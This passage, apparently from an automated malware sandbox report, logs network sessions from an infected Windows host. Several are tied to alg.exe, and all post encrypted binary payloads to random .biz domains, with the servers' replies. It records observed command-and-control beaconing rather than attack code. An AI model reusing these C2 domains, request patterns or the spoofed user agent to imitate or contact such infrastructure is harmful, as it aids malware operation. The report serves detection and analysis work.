                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.167325974 CET778OUTData Raw: ba 4b 3e a3 2c 18 b1 fb fe 02 00 00 77 54 86 41 7d d1 df 50 14 6a 22 4c 0e a2 27 72 48 03 ef 71 64 ae 52 7b bd 17 46 c7 e3 b6 bc 00 39 a9 7b f0 61 e4 86 97 2b f1 61 94 be 03 52 d4 fd 41 4f ec f9 41 ae 64 3e 2a f6 2f 21 78 6f 6f cd 4c a7 7c 83 40
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: K>,wTA}Pj"L'rHqdR{F9{a+aRAOAd>*/!xooL|@ACD<R<RU71UniB-ppbb/{stKvQ1+3Oa=New%1.9f'3<$jc5xSJsH.IO.'/]m@i
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.123334885 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=1c7d5518e27f8bf4e71a2ab5bb7af2e9|155.94.241.187|1731920296|1731920296|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      79192.168.2.75005813.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.406208038 CET358OUTPOST /nvkbktvsplwlkgem HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.406408072 CET842OUTData Raw: 8f ef 79 d0 1a c0 f0 e6 3e 03 00 00 0c 30 b2 4e 74 19 6d d5 f0 19 ff a3 f4 c9 99 a2 93 23 18 84 36 70 4e af d3 1b 8f 93 88 20 a3 73 79 88 39 62 63 b1 b7 3d 53 71 51 46 5e 29 19 a0 8a 9a 29 46 6e e6 40 1d f4 12 9d 05 8f 61 a8 08 27 9d e3 99 02 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: y>0Ntm#6pN sy9bc=SqQF^))Fn@a'.6~I=G{'S2YoUDYAz1OX2N@W/NucsVNK:GcnR}".k"8c92bCA2~UB&
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.837049961 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=59b32dff58ea39eb815cb0cbab9e274c|155.94.241.187|1731920297|1731920297|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      80192.168.2.75005985.214.228.140805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.374934912 CET345OUTPOST /e HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.374960899 CET778OUTData Raw: 5e cf 41 48 0c 62 e9 6e fe 02 00 00 66 d7 cd a9 1a a6 82 43 06 84 43 4b 0e 2f 9a 26 55 c5 39 b2 7c 2a 63 2c 47 b6 e9 ad 33 12 51 99 a8 44 6a e9 d8 32 a6 07 f2 be ac c9 22 10 c4 57 3c 4c 67 dd ef f2 94 e0 b0 86 72 36 6e c3 be 02 30 7f 78 a6 57 f4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ^AHbnfCCK/&U9|*c,G3QDj2"W<Lgr6n0xW.s;wQ"Uz0nh~m%-:;JMjG3NrRaNrygr,$r=E2B/}2&XB$PPgrpfY$[A6-:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.254091024 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 404 page not found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.441463947 CET359OUTPOST /sywxrbcrkxovprj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.441517115 CET778OUTData Raw: 1e ad 2a 64 14 99 3f dc fe 02 00 00 c4 2f 56 d8 37 3b e0 3a 03 16 41 95 f4 f5 36 e7 ba 2b 19 fa 0d 6d 3f da 46 e9 73 6d 67 e4 2c 27 59 0f cd ac e5 0d aa f6 78 22 97 23 e8 46 ca d6 cd 8e 67 40 b8 89 60 6d b6 62 0d 4d fa c6 89 3a 8f 17 3c a3 bf 8b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: *d?/V7;:A6+m?Fsmg,'Yx"#Fg@`mbM:<}e:(HJ51M/|1+gM/4k!$;VS%k:Nx]1M3gG!JRij<NE6oPN4^f]B[n?AOpG
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.705045938 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 404 page not found


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      81192.168.2.75006044.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854978085 CET353OUTPOST /smwfchek HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.854994059 CET842OUTData Raw: e7 bf df f5 00 ee 28 d9 3e 03 00 00 b5 f6 e0 1a 34 de 88 d9 f6 6f 9f 68 32 44 6c 75 c0 0b 80 5f ac 50 21 04 76 f2 c3 a2 3c 7e 27 17 c0 4b ff 2f c4 50 be 9a 84 b3 a0 f8 dc d6 32 1e 70 e3 a9 7c 94 a5 bc 3e 27 73 f4 b6 5b d4 14 a8 1e c1 b4 33 91 db
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: (>4oh2Dlu_P!v<~'K/P2p|>'s[3&7zP:BzOZCX')%!`A@4J8U*ff8P<::y#AbJiW;:Mt<CLF<b1dAGX0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.528311968 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=25376dbff96d5be6ec5441b8e835f3c8|155.94.241.187|1731920298|1731920298|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      82192.168.2.75006154.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553879976 CET360OUTPOST /pgswneolngwqmbma HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.553910971 CET842OUTData Raw: df e1 90 12 c9 19 3d 47 3e 03 00 00 eb 00 8e 4a ac ba 8d 66 9c c2 c9 fb 4c 8e 2b 9c 56 2a 8e 78 a6 68 71 64 f7 e2 3b d0 f3 39 78 23 6b 43 45 0f 70 79 10 c6 d4 b2 92 1f 78 45 f6 06 a9 1d cb 5d 3f 95 7b be d1 a1 52 f0 ff bf 54 08 bd 2a 6c fb 9b 4b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: =G>JfL+V*xhqd;9x#kCEpyxE]?{RT*lK*ia`X\7|lah<Hl}X% BuDqKl}EIYXU~c5F&?4<16W.lj3oPa%K^[;zgKk~%zlEa
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.402029991 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=5656ed73557aa3732ed2832c99cfc212|155.94.241.187|1731920299|1731920299|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      83192.168.2.75006247.129.31.212805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951535940 CET344OUTPOST /b HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.951535940 CET778OUTData Raw: 12 7b 12 cc 50 1d 5a aa fe 02 00 00 ba ff 8f 8b f6 47 ae 6b 85 71 bd 46 d1 83 58 dd 85 11 eb ce 6d b7 7d 29 e0 2c af 96 fe 7b 81 40 26 a2 f2 c6 54 9c ab 5a d7 af 19 f3 94 8c 1e f6 5b 0b e0 e5 92 5d f8 8b e6 2e 3f c5 c8 53 b3 80 c6 73 40 f8 a2 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: {PZGkqFXm}),{@&TZ[].?Ss@;OM^o9,myFvHnz4Jwce`7cW]-O`zYH+u4|-&UZ+R`<5uuQ,YYUwVHxYFo1v
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.420805931 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=afa599aaab5b372146bb720bf2297749|155.94.241.187|1731920300|1731920300|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      84192.168.2.75006335.164.78.20080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422815084 CET347OUTPOST /ufwhu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.422975063 CET842OUTData Raw: 08 98 be ba ae 89 80 f1 3e 03 00 00 6b 1d 0d 44 1d b3 fb 2c 7f d2 f7 d3 8f 85 2e 34 fa 28 c9 6b 2a b7 24 d7 f3 ac 54 52 ef c5 8b e7 a1 26 37 4c bb 15 92 dd fe b6 df 25 5a 92 3e 0e 67 b6 a8 24 54 9e 38 80 85 7f 95 a2 a0 1a 1f 53 07 f5 d3 16 b6 0c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: >kD,.4(k*$TR&7L%Z>g$T8SKepWWxo3+bu5p]DzP^o-F6"lhGk#DRV/zBvK`A!LvgQ)(jlb*?QVyFnhZN`}R+8?52t!KLlW
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.267492056 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=9a7375c20d650b5e9520046e3a938b2b|155.94.241.187|1731920300|1731920300|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      85192.168.2.75006434.211.97.45805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.744335890 CET351OUTPOST /dinrksxkdm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.744358063 CET778OUTData Raw: 4a a8 8b d9 3a a5 6d eb fe 02 00 00 b8 c7 00 af d2 b2 13 e8 e3 7c f1 de ae 7d 48 ac e6 59 be 65 d6 8e f4 39 9b 38 0e 9e 72 bf 72 e7 92 e8 c0 c2 49 5a 4e 27 74 9b 9d ea ee 43 a7 e8 8e 00 54 9d 75 b5 fe 4e 47 d6 c5 95 17 58 16 01 fe f2 c2 fd d5 ec
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: J:m|}HYe98rrIZN'tCTuNGXcV%Dx.ww4$`6ys(BD*Q:N-H]r'6{B!9kEwaKu#A/c@
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.570540905 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3edf6646c9e1743f67cd690dfc4f8d37|155.94.241.187|1731920301|1731920301|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      86192.168.2.7500653.94.10.3480
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.975764990 CET351OUTPOST /pntkcm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.975799084 CET842OUTData Raw: 85 d7 4b e6 a3 6e f5 d8 3e 03 00 00 65 2b 92 15 27 b7 aa 8f 5a a2 5a dd 4b 6c 17 17 44 84 4c 9f 48 85 68 6b fd d8 13 b4 ff 75 c8 b4 d6 b3 9d bd 17 e7 bb 35 1f dd 86 93 b9 33 82 1e 03 eb bb e7 f5 d1 52 52 0f b7 b5 71 28 18 38 48 ac 37 fb 8b e4 21
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: Kn>e+'ZZKlDLHhku53RRq(8H7!e>qJPxE{a/"!oMb[`ZUQIXQ<J:Nxfubj!8H>aGGxv.IWJ;~c2%)M)fDI
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.636013985 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=95745d89293df0589e20683c255ae1ac|155.94.241.187|1731920302|1731920302|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      87192.168.2.75006647.129.31.212805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.034554005 CET346OUTPOST /ovpu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
